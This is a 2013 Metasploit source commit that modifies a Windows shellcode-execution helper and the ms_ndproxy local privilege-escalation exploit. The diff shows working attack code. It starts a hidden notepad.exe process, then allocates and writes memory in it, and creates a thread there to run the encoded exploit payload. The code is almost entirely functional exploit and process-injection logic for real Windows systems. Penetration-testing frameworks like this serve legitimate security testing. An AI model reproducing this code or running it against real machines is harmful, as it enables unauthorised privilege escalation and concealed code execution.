Create a new process to host the final payload

jvazquez-r7 · jvazquez-r7 · commit 5c1ca97e2144 · 2013-12-12T08:26:44.000-06:00
diff --git a/lib/msf/core/post/windows/process.rb b/lib/msf/core/post/windows/process.rb
@@ -23,15 +23,17 @@ def execute_shellcode(shellcode, base_addr=nil, pid=nil)
     else
       shell_addr = host.memory.allocate(shellcode.length, nil, base_addr)
     end
+
+    host.memory.protect(shell_addr)
+
     if host.memory.write(shell_addr, shellcode) < shellcode.length
       vprint_error("Failed to write shellcode")
       return false
     end
 
     vprint_status("Creating the thread to execute in 0x#{shell_addr.to_s(16)} (pid=#{pid.to_s})")
-    ret = session.railgun.kernel32.CreateThread(nil, 0, shell_addr, nil, 0, nil)
-    if ret['return'] < 1
-      vprint_error("Unable to CreateThread")
+    thread = host.thread.create(shell_addr,0)
+    unless thread.instance_of?(Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Thread)
       return false
     end
 
diff --git a/modules/exploits/windows/local/ms_ndproxy.rb b/modules/exploits/windows/local/ms_ndproxy.rb
@@ -9,6 +9,7 @@
 class Metasploit3 < Msf::Exploit::Local
   Rank = AverageRanking
 
+  include Msf::Post::File
   include Msf::Post::Windows::Priv
   include Msf::Post::Windows::Process
 
@@ -229,6 +230,14 @@ def fill_memory(proc, address, length, content)
     return address
   end
 
+  def create_proc
+    windir = expand_path("%windir%")
+    cmd = "#{windir}\\System32\\notepad.exe"
+    # run hidden
+    proc = session.sys.process.execute(cmd, nil, {'Hidden' => true })
+    return proc.pid
+  end
+
   def disclose_addresses(t)
     addresses = {}
 
@@ -415,11 +424,12 @@ def exploit
       fail_with(Failure::Unknown, "The exploitation wasn't successful")
     end
 
-    print_good("Exploitation successful!")
-
+    print_good("Exploitation successful! Creating a new process and launching payload...")
+    new_pid = create_proc
     p = payload.encoded
-    print_status("Injecting #{p.length.to_s} bytes to memory and executing it...")
-    if execute_shellcode(p)
+
+    print_status("Injecting #{p.length.to_s} bytes into #{new_pid} memory and executing it...")
+    if execute_shellcode(p, nil, new_pid)
       print_good("Enjoy")
     else
       fail_with(Failure::Unknown, "Error while executing the payload")
